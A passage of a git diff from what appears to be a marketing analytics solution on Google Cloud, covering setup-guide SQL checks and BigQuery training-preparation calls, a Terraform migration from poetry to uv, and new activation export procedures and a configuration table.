`feature_store.user_rolling_window_lifetime_metrics`; - - ## Checking purchase propensity tables are not empty - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_dimensions`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_rolling_window_metrics`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.purchase_propensity_label`; - - ## Checking audience segmentation tables are not empty - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_segmentation_dimensions`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_lookback_metrics`; - - ## There are no tables used by the auto audience segmentation use case - ## in the feature store. - - ## Checking churn propensity tables are not empty - ## This use case reuses the user_dimensions and user_rolling_window_metrics, - ## make sure you invoke the backfill for these tables. CALLs are listed above - ## under the instructions for backfill purchase propensity - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_dimensions`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.user_rolling_window_metrics`; - SELECT COUNT(user_pseudo_id) FROM `feature_store.churn_propensity_label`; - - ## Checking gemini insights tables are not empty - SELECT COUNT(feature_date) FROM `feature_store.user_scoped_metrics`; - SELECT COUNT(feature_date) FROM `gemini_insights.user_behaviour_revenue_insights_daily`; - SELECT COUNT(feature_date) FROM `gemini_insights.user_behaviour_revenue_insights_weekly`; - SELECT COUNT(feature_date) FROM `gemini_insights.user_behaviour_revenue_insights_monthly`; - ``` - -1. Redeploy the ML pipelines using Terraform. - - On your code editor, change the variable `deploy_pipelines` from `true` to `false`, on the TF variables file `${TERRAFORM_RUN_DIR}/terraform.tfvars`. - Next, undeploy the ML pipelines component by applying the terraform configuration. - - ```bash - terraform -chdir="${TERRAFORM_RUN_DIR}" apply - ``` - - Now, to deploy the ML pipelines component again, revert your changes on the TF variables file `${TERRAFORM_RUN_DIR}/terraform.tfvars` and apply the terraform configuration by running the commad above again. - - **Note:** The training pipelines use schemas defined by a `custom_transformations` parameter in your `config.yaml` or by the training table/view schema itself. - So at first, during the first deployment i.e. `tf apply`, because the views are not created yet, we assume a fixed schema in case no `custom_transformations` parameter is provided. - Then, you need to redeploy to make sure that since all the table views exist now, redeploy the pipelines to make sure you fetch the right schema to be provided to the training pipelines. - -1. Once the feature store is populated and the pipelines are redeployed, manually invoke the BigQuery procedures for preparing the training datasets, which have the suffix `_training_preparation`. - - On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. - ```sql - ## Training preparation for Aggregated Value Based Bidding - CALL `aggregated_vbb.invoke_aggregated_value_based_bidding_training_preparation`(); - - ## Training preparation for Customer Lifetime Value - CALL `customer_lifetime_value.invoke_customer_lifetime_value_training_preparation`(); - - ## Training preparation for Purchase Propensity - CALL `purchase_propensity.invoke_purchase_propensity_training_preparation`(); - - ## Training preparation for Audience Segmentation - CALL `audience_segmentation.invoke_audience_segmentation_training_preparation`(); - - ## Training preparation for Auto Audience Segmentation - CALL `auto_audience_segmentation.invoke_auto_audience_segmentation_training_preparation`(); - - ## Training preparation for Churn Propensity - CALL `churn_propensity.invoke_churn_propensity_training_preparation`(); - - ## There is no need to prepare training data for the gemini insights use case. - ## Gemini insights only require feature engineering the inference pipelines. - ## The gemini insights are saved in the gemini insights dataset, specified in the `config.yaml.tftpl` file. - ``` - -1. Check whether the training preparation tables you have run the procedures above have rows in it. - - On the Google Cloud console, navigate to BigQuery page. On the query composer, run the following queries to invoke the stored procedures. - ```sql - ## Checking aggregated value based bidding tables are not empty. - ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. - SELECT * FROM `aggregated_vbb.aggregated_value_based_bidding_training_full_dataset`; - - ## Checking customer ltv tables are not empty - ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. - SELECT COUNT(user_pseudo_id) FROM `customer_lifetime_value.customer_lifetime_value_training_full_dataset`; - - ## Checking purchase propensity tables are not empty - ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. - SELECT COUNT(user_pseudo_id) FROM `purchase_propensity.purchase_propensity_training_full_dataset`; - - ## Checking audience segmentation tables are not empty - ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. - SELECT COUNT(user_pseudo_id) FROM `audience_segmentation.audience_segmentation_training_full_dataset`; - - ## Checking churn propensity tables are not empty - ## For training purposes, your dataset must always include at least 1,000 rows for tabular training data. - SELECT COUNT(user_pseudo_id) FROM `churn_propensity.churn_propensity_training_full_dataset`; - ``` -Your Marketing Analytics Jumpstart solution is ready for daily operation. Plan for the days you want your model(s) to be trained, change the scheduler dates in the `config.yaml.tftpl` file or manually trigger training whenever you want. For more information, read the documentations in the [docs/ folder](../../docs/). diff --git a/infrastructure/terraform/main.tf b/infrastructure/terraform/main.tf index e2186b06..4c3054f3 100644 --- a/infrastructure/terraform/main.tf +++ b/infrastructure/terraform/main.tf @@ -42,23 +42,28 @@ provider "google" { region = var.google_default_region } +data "google_project" "main_project" { + provider = google + project_id = var.main_project_id +} + data "google_project" "feature_store_project" { - provider = google + provider = google project_id = var.feature_store_project_id } data "google_project" "activation_project" { - provider = google + provider = google project_id = var.activation_project_id } data "google_project" "data_processing_project" { - provider = google + provider = google project_id = var.data_processing_project_id } data "google_project" "data_project" { - provider = google + provider = google project_id = var.data_project_id } @@ -66,36 +71,36 @@ data "google_project" "data_project" { # The locals block is used to define variables that are used in the configuration. locals { # The source_root_dir is the root directory of the project. - source_root_dir = "../.." + source_root_dir = "../.." # The config_file_name is the name of the config file. - config_file_name = "config" - # The poetry_run_alias is the alias of the poetry command. - poetry_run_alias = "${var.poetry_cmd} run" + config_file_name = "config" + # The uv_run_alias is the alias of the uv run command. + uv_run_alias = "${var.uv_cmd} run" # The mds_dataset_suffix is the suffix of the marketing data store dataset. - mds_dataset_suffix = var.create_staging_environment ? "staging" : var.create_dev_environment ? "dev" : "prod" + mds_dataset_suffix = var.property_id # The project_toml_file_path is the path to the project.toml file. - project_toml_file_path = "${local.source_root_dir}/pyproject.toml" + project_toml_file_path = "${local.source_root_dir}/pyproject.toml" # The project_toml_content_hash is the hash of the project.toml file. # This is used for the triggers of the local-exec provisioner. project_toml_content_hash = filesha512(local.project_toml_file_path) # The generated_sql_queries_directory_path is the path to the generated sql queries directory. generated_sql_queries_directory_path = "${local.source_root_dir}/sql/query" # The generated_sql_queries_fileset is the list of files in the generated sql queries directory. - generated_sql_queries_fileset = [for f in fileset(local.generated_sql_queries_directory_path, "*.sqlx") : "${local.generated_sql_queries_directory_path}/${f}"] + generated_sql_queries_fileset = [for f in fileset(local.generated_sql_queries_directory_path, "*.sqlx") : "${local.generated_sql_queries_directory_path}/${f}"] # The generated_sql_queries_content_hash is the sha512 hash of file sha512 hashes in the generated sql queries directory. - generated_sql_queries_content_hash = sha512(join("", [for f in local.generated_sql_queries_fileset : fileexists(f) ? filesha512(f) : sha512("file-not-found")])) + generated_sql_queries_content_hash = sha512(join("", [for f in local.generated_sql_queries_fileset : fileexists(f) ? filesha512(f) : sha512("file-not-found")])) # The generated_sql_procedures_directory_path is the path to the generated sql procedures directory. generated_sql_procedures_directory_path = "${local.source_root_dir}/sql/procedure" # The generated_sql_procedures_fileset is the list of files in the generated sql procedures directory. - generated_sql_procedures_fileset = [for f in fileset(local.generated_sql_procedures_directory_path, "*.sqlx") : "${local.generated_sql_procedures_directory_path}/${f}"] + generated_sql_procedures_fileset = [for f in fileset(local.generated_sql_procedures_directory_path, "*.sqlx") : "${local.generated_sql_procedures_directory_path}/${f}"] # The generated_sql_procedures_content_hash is the sha512 hash of file sha512 hashes in the generated sql procedures directory. - generated_sql_procedures_content_hash = sha512(join("", [for f in local.generated_sql_procedures_fileset : fileexists(f) ? filesha512(f) : sha512("file-not-found")])) + generated_sql_procedures_content_hash = sha512(join("", [for f in local.generated_sql_procedures_fileset : fileexists(f) ? filesha512(f) : sha512("file-not-found")])) } -# Create a configuration file for the feature store. +# Create a configuration file for the solution. # the template file is located at -# ${local.source_root_dir}/config/${var.feature_store_config_env}.yaml.tftpl. +# ${local.source_root_dir}/config/${var.global_config_env}.yaml.tftpl. # This variable can be set in the terraform.tfvars file. Its default value is "config". # #The template file contains the configuration for the feature store. @@ -109,12 +114,12 @@ locals { # pipelines_github_owner: The owner of the GitHub repository that contains the pipelines code. # pipelines_github_repo: The name of the GitHub repository that contains the pipelines code. # location: The location in which the feature store will be created. -resource "local_file" "feature_store_configuration" { +resource "local_file" "global_configuration" { filename = "${local.source_root_dir}/config/${local.config_file_name}.yaml" - content = templatefile("${local.source_root_dir}/config/${var.feature_store_config_env}.yaml.tftpl", { - project_id = var.feature_store_project_id - project_name = data.google_project.feature_store_project.name - project_number = data.google_project.feature_store_project.number + content = templatefile("${local.source_root_dir}/config/${var.global_config_env}.yaml.tftpl", { + project_id = var.main_project_id + project_name = data.google_project.main_project.name + project_number = data.google_project.main_project.number cloud_region = var.google_default_region mds_project_id = var.data_project_id mds_dataset = "${var.mds_dataset_prefix}_${local.mds_dataset_suffix}" @@ -122,43 +127,30 @@ resource "local_file" "feature_store_configuration" { pipelines_github_owner = var.pipelines_github_owner pipelines_github_repo = var.pipelines_github_repo # TODO: this needs to be specific to environment. - location = var.destination_data_location + location = var.destination_data_location + time_zone = var.time_zone + pipeline_configuration = var.pipeline_configuration + non_ecomm_events_list = var.non_ecomm_events_list + non_ecomm_target_event = var.non_ecomm_target_event }) } -# Runs the poetry command to install the dependencies. -# The command is: poetry install -resource "null_resource" "poetry_install" { - triggers = { - create_command = "${var.poetry_cmd} lock && ${var.poetry_cmd} install" - source_contents_hash = local.project_toml_content_hash - } - - # Only run the command when `terraform apply` executes and the resource doesn't exist. - provisioner "local-exec" { - when = create - command = self.triggers.create_command - working_dir = local.source_root_dir - } -} - data "external" "check_ga4_property_type" { - program = ["bash", "-c", "${local.poetry_run_alias} ga4-setup --ga4_resource=check_property_type --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id}"] + program = ["bash", "-c", "${local.uv_run_alias} ga4-setup --ga4_resource=check_property_type --ga4_property_id=${var.ga4_property_id} --ga4_stream_id=${var.ga4_stream_id}"] working_dir = local.source_root_dir - depends_on = [null_resource.poetry_install] } -# Runs the poetry invoke command to generate the sql queries and procedures. +# Runs the uv invoke command to generate the sql queries and procedures. # This command is executed before the feature store is created. resource "null_resource" "generate_sql_queries" { triggers = { # The create command generates the sql queries and procedures. - # The command is: poetry inv [function_name] --env-name=${local.config_file_name} + # The command is: uv inv [function_name] --env-name=${local.config_file_name} # The --env-name argument is the name of the configuration file. create_command = <<-EOT - ${local.poetry_run_alias} inv apply-config-parameters-to-all-queries --env-name=${local.config_file_name} - ${local.poetry_run_alias} inv apply-config-parameters-to-all-procedures --env-name=${local.config_file_name} + ${local.uv_run_alias} inv apply-config-parameters-to-all-queries --env-name=${local.config_file_name} + ${local.uv_run_alias} inv apply-config-parameters-to-all-procedures --env-name=${local.config_file_name} EOT # The destroy command removes the generated sql queries and procedures. @@ -170,14 +162,10 @@ resource "null_resource" "generate_sql_queries" { # The working directory is the root of the project. working_dir = local.source_root_dir - # The poetry_installed trigger is the ID of the null_resource.poetry_install resource. - # This is used to ensure that the poetry command is run before the generate_sql_queries command. - poetry_installed = null_resource.poetry_install.id - # The source_contents_hash trigger is the hash of the project.toml file. # This is used to ensure that the generate_sql_queries command is run only if the project.toml file has changed. # It also ensures that the generate_sql_queries command is run only if the sql queries and procedures have changed. - source_contents_hash = local_file.feature_store_configuration.content_sha512 + source_contents_hash = local_file.global_configuration.content_sha512 destination_queries_hash = local.generated_sql_queries_content_hash destination_procedures_hash = local.generated_sql_procedures_content_hash } @@ -204,108 +192,10 @@ resource "null_resource" "generate_sql_queries" { } } - -module "initial_project_services" { - source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" - - disable_dependent_services = false - disable_services_on_destroy = false - - project_id = var.tf_state_project_id - - activate_apis = [ - "cloudresourcemanager.googleapis.com", - "serviceusage.googleapis.com", - "iam.googleapis.com" - ] -} - -# This resource executes gcloud commands to check whether the Cloud Resource Manager API is enabled. -# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. -resource "null_resource" "check_cloudresourcemanager_api" { - provisioner "local-exec" { - command = <<-EOT - COUNTER=0 - MAX_TRIES=100 - while ! gcloud services list --project=${module.initial_project_services.project_id} | grep -i "cloudresourcemanager.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] - do - sleep 6 - printf "." - COUNTER=$((COUNTER + 1)) - done - if [ $COUNTER -eq $MAX_TRIES ]; then - echo "cloudresourcemanager api is not enabled, terraform can not continue!" - exit 1 - fi - sleep 20 - EOT - } - - depends_on = [ - module.initial_project_services - ] -} - - -# This resource executes gcloud commands to check whether the service usage API is enabled. -# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. -resource "null_resource" "check_serviceusage_api" { - provisioner "local-exec" { - command = <<-EOT - COUNTER=0 - MAX_TRIES=100 - while ! gcloud services list --project=${module.initial_project_services.project_id} | grep -i "serviceusage.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] - do - sleep 6 - printf "." - COUNTER=$((COUNTER + 1)) - done - if [ $COUNTER -eq $MAX_TRIES ]; then - echo "serviceusage api is not enabled, terraform can not continue!" - exit 1 - fi - sleep 20 - EOT - } - - depends_on = [ - module.initial_project_services - ] -} - - -# This resource executes gcloud commands to check whether the IAM API is enabled. -# Since enabling APIs can take a few seconds, we need to make the deployment wait until the API is enabled before resuming. -resource "null_resource" "check_iam_api" { - provisioner "local-exec" { - command = <<-EOT - COUNTER=0 - MAX_TRIES=100 - while ! gcloud services list --project=${module.initial_project_services.project_id} | grep -i "iam.googleapis.com" && [ $COUNTER -lt $MAX_TRIES ] - do - sleep 6 - printf "." - COUNTER=$((COUNTER + 1)) - done - if [ $COUNTER -eq $MAX_TRIES ]; then - echo "iam api is not enabled, terraform can not continue!" - exit 1 - fi - sleep 20 - EOT - } - - depends_on = [ - module.initial_project_services - ] -} - # Create the data store module. # The data store module creates the marketing data store in BigQuery, creates the ETL pipeline in Dataform # for the marketing data from Google Ads and Google Analytics. -# The data store is created only if the `create_prod_environment`, `create_staging_environment` -# or `create_dev_environment` variable is set to true in the terraform.tfvars file. +# The data store is created only if the `deploy_dataform` variable is set to true in the terraform.tfvars file. # The data store is created in the `data_project_id` project. module "data_store" { # The source directory of the data store module. @@ -315,14 +205,14 @@ module "data_store" { google_default_region = var.google_default_region # The dataform_region is set in the terraform.tfvars file. Its default value is "us-central1". - dataform_region = var.dataform_region + dataform_region = var.dataform_region # The source_ga4_export_project_id is set in the terraform.tfvars file. # The source_ga4_export_dataset is set in the terraform.tfvars file. # The source_ads_export_data is set in the terraform.tfvars file. - source_ga4_export_project_id = var.source_ga4_export_project_id - source_ga4_export_dataset = var.source_ga4_export_dataset - source_ads_export_data = var.source_ads_export_data + source_ga4_export_project_id = var.source_ga4_export_project_id + source_ga4_export_dataset = var.source_ga4_export_dataset + source_ads_export_data = var.source_ads_export_data ga4_incremental_processing_days_back = var.ga4_incremental_processing_days_back # The data_processing_project_id is set in the terraform.tfvars file. @@ -331,24 +221,16 @@ module "data_store" { data_processing_project_id = var.data_processing_project_id data_project_id = var.data_project_id destination_data_location = var.destination_data_location - + # The dataform_github_repo is set in the terraform.tfvars file. # The dataform_github_token is set in the terraform.tfvars file. dataform_github_repo = var.dataform_github_repo dataform_github_token = var.dataform_github_token - # The create_dev_environment is set in the terraform.tfvars file. - # The create_dev_environment determines if the dev environment is created. - # When the value is true, the dev environment is created. - # The create_staging_environment is set in the terraform.tfvars file. - # The create_staging_environment determines if the staging environment is created. - # When the value is true, the staging environment is created. - # The create_prod_environment is set in the terraform.tfvars file. - # The create_prod_environment determines if the prod environment is created. - # When the value is true, the prod environment is created. - create_dev_environment = var.create_dev_environment - create_staging_environment = var.create_staging_environment - create_prod_environment = var.create_prod_environment + # The create_dataform determines if dataform is created. + # When the value is true, the dataform environment is created. + deploy_dataform = var.deploy_dataform + property_id = var.property_id # The dev_data_project_id is the project ID of where the dev datasets will created. #If not provided, data_project_id will be used. @@ -374,9 +256,31 @@ module "data_store" { # The project_owner_email is set in the terraform.tfvars file. # An example of a valid email address is "william.mckinley@my-own-personal-domain.com". project_owner_email = var.project_owner_email + + # Set the time zone for the scheduled jobs + time_zone = var.time_zone } +#module "purchase_propensity" { +# # The source is the path to the feature store module. +# source = "./modules/purchase-propensity" +# config_file_path = local_file.global_configuration.id != "" ? local_file.global_configuration.filename : "" +# enabled = var.deploy_purchase_propensity +# # the count determines if the feature store is created or not. +# # If the count is 1, the feature store is created. +# # If the count is 0, the feature store is not created. +# # This is done to avoid creating the feature store if the `deploy_purchase_propensity` variable is set to false in the terraform.tfvars file. +# count = var.deploy_purchase_propensity ? 1 : 0 +# project_id = var.feature_store_project_id +# # The region is the region in which the feature store is created. +# # This is set to the default region in the terraform.tfvars file. +# region = var.google_default_region +# # The sql_dir_input is the path to the sql directory. +# # This is set to the path to the sql directory in the feature store module. +# sql_dir_input = null_resource.generate_sql_queries.id != "" ? "${local.source_root_dir}/sql" : "" +#} + # Create the feature store module. # The feature store module creates the feature store and the sql queries and procedures in BigQuery. @@ -385,20 +289,20 @@ module "data_store" { module "feature_store" { # The source is the path to the feature store module. source = "./modules/feature-store" - config_file_path = local_file.feature_store_configuration.id != "" ? local_file.feature_store_configuration.filename : "" + config_file_path = local_file.global_configuration.id != "" ? local_file.global_configuration.filename : "" enabled = var.deploy_feature_store # the count determines if the feature store is created or not. # If the count is 1, the feature store is created. # If the count is 0, the feature store is not created. # This is done to avoid creating the feature store if the `deploy_feature_store` variable is set to false in the terraform.tfvars file. - count = var.deploy_feature_store ? 1 : 0 - project_id = var.feature_store_project_id + count = var.deploy_feature_store ? 1 : 0 + project_id = var.feature_store_project_id # The region is the region in which the feature store is created. # This is set to the default region in the terraform.tfvars file. - region = var.google_default_region + region = var.google_default_region # The sql_dir_input is the path to the sql directory. # This is set to the path to the sql directory in the feature store module. - sql_dir_input = null_resource.generate_sql_queries.id != "" ? "${local.source_root_dir}/sql" : "" + sql_dir_input = null_resource.generate_sql_queries.id != "" ? "${local.source_root_dir}/sql" : "" } @@ -410,19 +314,16 @@ module "feature_store" { module "pipelines" { # The source is the path to the pipelines module. source = "./modules/pipelines" - config_file_path = local_file.feature_store_configuration.id != "" ? local_file.feature_store_configuration.filename : "" - poetry_run_alias = local.poetry_run_alias + config_file_path = local_file.global_configuration.id != "" ? local_file.global_configuration.filename : "" + uv_run_alias = local.uv_run_alias # The count determines if the pipelines are created or not. # If the count is 1, the pipelines are created. # If the count is 0, the pipelines are not created. # This is done to avoid creating the pipelines if the `deploy_pipelines` variable is set to false in the terraform.tfvars file. - count = var.deploy_pipelines ? 1 : 0 - # The poetry_installed trigger is the ID of the null_resource.poetry_install resource. - # This is used to ensure that the poetry command is run before the pipelines module is created. - poetry_installed = null_resource.poetry_install.id + count = var.deploy_pipelines ? 1 : 0 # The project_id is the project in which the data is stored. # This is set to the data project ID in the terraform.tfvars file. - mds_project_id = var.data_project_id + mds_project_id = var.data_project_id } @@ -433,53 +334,50 @@ module "pipelines" { # The activation function is created in the `activation_project_id` project. module "activation" { # The source is the path to the activation module. - source = "./modules/activation" + source = "./modules/activation" # The project_id is the project in which the activation function is created. # This is set to the activation project ID in the terraform.tfvars file. - project_id = var.activation_project_id + project_id = var.activation_project_id # The project number of where the activation function is created. # This is retrieved from the activation project id using the google_project data source. - project_number = data.google_project.activation_project.number + project_number = data.google_project.activation_project.number # The location is the google_default_region variable. # This is set to the default region in the terraform.tfvars file. - location = var.google_default_region + location = var.google_default_region # The data_location is the destination_data_location variable. # This is set to the destination data location in the terraform.tfvars file. - data_location = var.destination_data_location + data_location = var.destination_data_location # The trigger_function_location is the location of the trigger function. # The trigger function is used to trigger the activation function. # The trigger function is created in the same region as the activation function. trigger_function_location = var.google_default_region - # The poetry_cmd is the poetry_cmd variable. - # This can be set on the poetry_cmd in the terraform.tfvars file. - poetry_cmd = var.poetry_cmd + # The uv_run_alias is the uv_run_alias variable. + # This can be set on the uv_cmd in the terraform.tfvars file. + uv_run_alias = local.uv_run_alias # The ga4_measurement_id is the ga4_measurement_id variable. # This can be set on the ga4_measurement_id in the terraform.tfvars file. - ga4_measurement_id = var.ga4_measurement_id + ga4_measurement_id = var.ga4_measurement_id # The ga4_measurement_secret is the ga4_measurement_secret variable. # This can be set on the ga4_measurement_secret in the terraform.tfvars file. - ga4_measurement_secret = var.ga4_measurement_secret + ga4_measurement_secret = var.ga4_measurement_secret # The ga4_property_id is the ga4_property_id variable. # This is set on the ga4_property_id in the terraform.tfvars file. # The ga4_property_id is the property ID of the GA4 data. # You can find the property ID in the GA4 console. - ga4_property_id = var.ga4_property_id + ga4_property_id = var.ga4_property_id # The ga4_stream_id is the ga4_stream_id variable. # This is set on the ga4_stream_id in the terraform.tfvars file. # The ga4_stream_id is the stream ID of the GA4 data. # You can find the stream ID in the GA4 console. - ga4_stream_id = var.ga4_stream_id + ga4_stream_id = var.ga4_stream_id # The count determines if the activation function is created or not. # If the count is 1, the activation function is created. # If the count is 0, the activation function is not created. # This is done to avoid creating the activation function if the `deploy_activation` variable is set # to false in the terraform.tfvars file. - count = var.deploy_activation ? 1 : 0 - # The poetry_installed is the ID of the null_resource poetry_install - # This is used to ensure that the poetry command is run before the activation module is created. - poetry_installed = null_resource.poetry_install.id - mds_project_id = var.data_project_id - mds_dataset_suffix = local.mds_dataset_suffix + count = var.deploy_activation ? 1 : 0 + mds_project_id = var.data_project_id + mds_dataset_suffix = local.mds_dataset_suffix # The project_owner_email is set in the terraform.tfvars file. # An example of a valid email address is "william.mckinley@my-own-personal-domain.com". @@ -493,14 +391,16 @@ module "activation" { # The monitoring resources are created only if the `deploy_monitoring` variable is set to true in the terraform.tfvars file. # The monitoring resources are created in the `data_project_id` project. module "monitoring" { - source = "./modules/monitor" - count = var.deploy_monitoring ? 1 : 0 - project_id = var.data_project_id - location = var.google_default_region - mds_project_id = var.data_project_id - mds_dataset_suffix = local.mds_dataset_suffix - mds_location = var.google_default_region - mds_dataform_workspace = var.dataform_workspace - feature_store_project_id = var.feature_store_project_id - activation_project_id = var.activation_project_id + source = "./modules/monitor" + count = var.deploy_monitoring ? 1 : 0 + project_id = var.data_project_id + location = var.google_default_region + mds_project_id = var.data_project_id + mds_dataset_suffix = local.mds_dataset_suffix + mds_location = var.google_default_region + mds_dataform_workspace = var.dataform_workspace + feature_store_project_id = var.feature_store_project_id + activation_project_id = var.activation_project_id + purchase_propensity_dataset_id = module.feature_store[0].purchase_propensity_dataset_id + smart_bidding_configuration_table = module.activation[0].configuration_table_name } diff --git a/infrastructure/terraform/modules/activation/configuration-tables.tf b/infrastructure/terraform/modules/activation/configuration-tables.tf new file mode 100644 index 00000000..6d80eb51 --- /dev/null +++ b/infrastructure/terraform/modules/activation/configuration-tables.tf @@ -0,0 +1,69 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +locals { + config_id = "vbb_activation_configuration" + vbb_activation_configuration_file = "${local.config_id}.jsonl" +} + +# JSON configuration file for smart bidding based activation +resource "google_storage_bucket_object" "vbb_activation_configuration_file" { + name = "${local.configuration_folder}/${local.vbb_activation_configuration_file}" + source = "${local.template_dir}/${local.vbb_activation_configuration_file}" + bucket = module.pipeline_bucket.name +} + +# This data resources creates a data resource that renders a template file and stores the rendered content in a variable. +data "template_file" "load_vbb_activation_configuration_proc" { + template = file("${local.template_dir}/load_${local.config_id}.sql.tpl") + vars = { + project_id = module.project_services.project_id + dataset = module.bigquery.bigquery_dataset.dataset_id + config_file_uri = "gs://${module.pipeline_bucket.name}/${google_storage_bucket_object.vbb_activation_configuration_file.output_name}" + } +} + +# Store procedure that loads the json configuation file from GCS into a configuration table in BQ +resource "google_bigquery_routine" "load_vbb_activation_configuration_proc" { + project = module.project_services.project_id + dataset_id = module.bigquery.bigquery_dataset.dataset_id + routine_id = "load_${local.config_id}" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.template_file.load_vbb_activation_configuration_proc.rendered + description = "Procedure for loading vbb activation configuration from GCS bucket" +} + +# This resource creates a BigQuery table named vbb_activation_configuration +resource "google_bigquery_table" "smart_bidding_configuration" { + project = module.project_services.project_id + dataset_id = module.bigquery.bigquery_dataset.dataset_id + table_id = local.config_id + description = "stores configuration settings used to translate predicted deciles into monetary values for Smart Bidding strategies." + + # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. + deletion_protection = false + labels = { + version = "prod" + } + + # The schema attribute specifies the schema of the table. In this case, the schema is defined in the JSON file. + schema = file("${local.source_root_dir}/sql/schema/table/${local.config_id}.json") + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. + lifecycle { + ignore_changes = all + } +} diff --git a/infrastructure/terraform/modules/activation/export-procedures.tf b/infrastructure/terraform/modules/activation/export-procedures.tf index 55ab1001..86d942be 100644 --- a/infrastructure/terraform/modules/activation/export-procedures.tf +++ b/infrastructure/terraform/modules/activation/export-procedures.tf @@ -118,11 +118,34 @@ resource "google_bigquery_routine" "export_churn_propensity_procedure" { routine_id = "export_churn_propensity_predictions" routine_type = "PROCEDURE" language = "SQL" - definition_body = data.template_file.purchase_propensity_csv_export_query.rendered - description = "Export purchase propensity predictions as CSV for GA4 User Data Import" + definition_body = data.template_file.churn_propensity_csv_export_query.rendered + description = "Export churn propensity predictions as CSV for GA4 User Data Import" arguments { name = "prediction_table_name" mode = "IN" data_type = jsonencode({ "typeKind" : "STRING" }) } } + +data "template_file" "lead_score_propensity_csv_export_query" { + template = file("${local.source_root_dir}/templates/activation_user_import/lead_score_propensity_csv_export.sqlx") + vars = { + ga4_stream_id = var.ga4_stream_id + export_bucket = module.pipeline_bucket.name + } +} + +resource "google_bigquery_routine" "export_lead_score_propensity_procedure" { + project = null_resource.check_bigquery_api.id != "" ? module.project_services.project_id : var.project_id + dataset_id = module.bigquery.bigquery_dataset.dataset_id + routine_id = "export_lead_score_propensity_predictions" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.template_file.lead_score_propensity_csv_export_query.rendered + description = "Export lead score propensity predictions as CSV for GA4 User Data Import" + arguments { + name = "prediction_table_name" + mode = "IN" + data_type = jsonencode({ "typeKind" : "STRING" }) + } +} \ No newline at end of file diff --git a/infrastructure/terraform/modules/activation/main.tf b/infrastructure/terraform/modules/activation/main.tf index 1123410c..0a58a544 100644 --- a/infrastructure/terraform/modules/activation/main.tf +++ b/infrastructure/terraform/modules/activation/main.tf @@ -15,7 +15,6 @@ locals { app_prefix = "activation" source_root_dir = "../.." - poetry_run_alias = "${var.poetry_cmd} run" template_dir = "${local.source_root_dir}/templates" pipeline_source_dir = "${local.source_root_dir}/python/activation" trigger_function_dir = "${local.source_root_dir}/python/function" @@ -24,12 +23,15 @@ locals { auto_audience_segmentation_query_template_file = "auto_audience_segmentation_query_template.sqlx" cltv_query_template_file = "cltv_query_template.sqlx" purchase_propensity_query_template_file = "purchase_propensity_query_template.sqlx" + purchase_propensity_vbb_query_template_file = "purchase_propensity_vbb_query_template.sqlx" + lead_score_propensity_query_template_file = "lead_score_propensity_query_template.sqlx" + lead_score_propensity_vbb_query_template_file = "lead_score_propensity_vbb_query_template.sqlx" churn_propensity_query_template_file = "churn_propensity_query_template.sqlx" - measurement_protocol_payload_template_file = "app_payload_template.jinja2" activation_container_image_id = "activation-pipeline" docker_repo_prefix = "${var.location}-docker.pkg.dev/${var.project_id}" activation_container_name = "dataflow/${local.activation_container_image_id}" - source_archive_file = "activation_trigger_source.zip" + source_archive_file_prefix = "activation_trigger_source" + source_archive_file = "${local.source_archive_file_prefix}.zip" pipeline_service_account_name = "dataflow-worker" pipeline_service_account_email = "${local.app_prefix}-${local.pipeline_service_account_name}@${var.project_id}.iam.gserviceaccount.com" @@ -37,19 +39,14 @@ locals { trigger_function_account_name = "trigger-function" trigger_function_account_email = "${local.app_prefix}-${local.trigger_function_account_name}@${var.project_id}.iam.gserviceaccount.com" - builder_service_account_name = "build-job" + builder_service_account_name = "build-job" builder_service_account_email = "${local.app_prefix}-${local.builder_service_account_name}@${var.project_id}.iam.gserviceaccount.com" - activation_type_configuration_file = "${local.source_root_dir}/templates/activation_type_configuration_template.tpl" + activation_type_configuration_file = "${local.source_root_dir}/templates/activation_type_configuration_template.tpl" # This is calculating a hash number on the file content to keep track of changes and trigger redeployment of resources # in case the file content changes. activation_type_configuration_file_content_hash = filesha512(local.activation_type_configuration_file) - app_payload_template_file = "${local.source_root_dir}/templates/app_payload_template.jinja2" - # This is calculating a hash number on the file content to keep track of changes and trigger redeployment of resources - # in case the file content changes. - app_payload_template_file_content_hash = filesha512(local.activation_type_configuration_file) - activation_application_dir = "${local.source_root_dir}/python/activation" activation_application_fileset = [ "${local.activation_application_dir}/main.py", @@ -61,6 +58,20 @@ locals { # This is calculating a hash number on the files contents to keep track of changes and trigger redeployment of resources # in case any of these files contents changes. activation_application_content_hash = sha512(join("", [for f in local.activation_application_fileset : fileexists(f) ? filesha512(f) : sha512("file-not-found")])) + + ga4_setup_source_file = "${local.source_root_dir}/python/ga4_setup/setup.py" + ga4_setup_source_file_content_hash = filesha512(local.ga4_setup_source_file) + + # GCP Cloud Build is not available in all regions. + cloud_build_available_locations = [ + "us-central1", + "us-west2", + "europe-west1", + "asia-east1", + 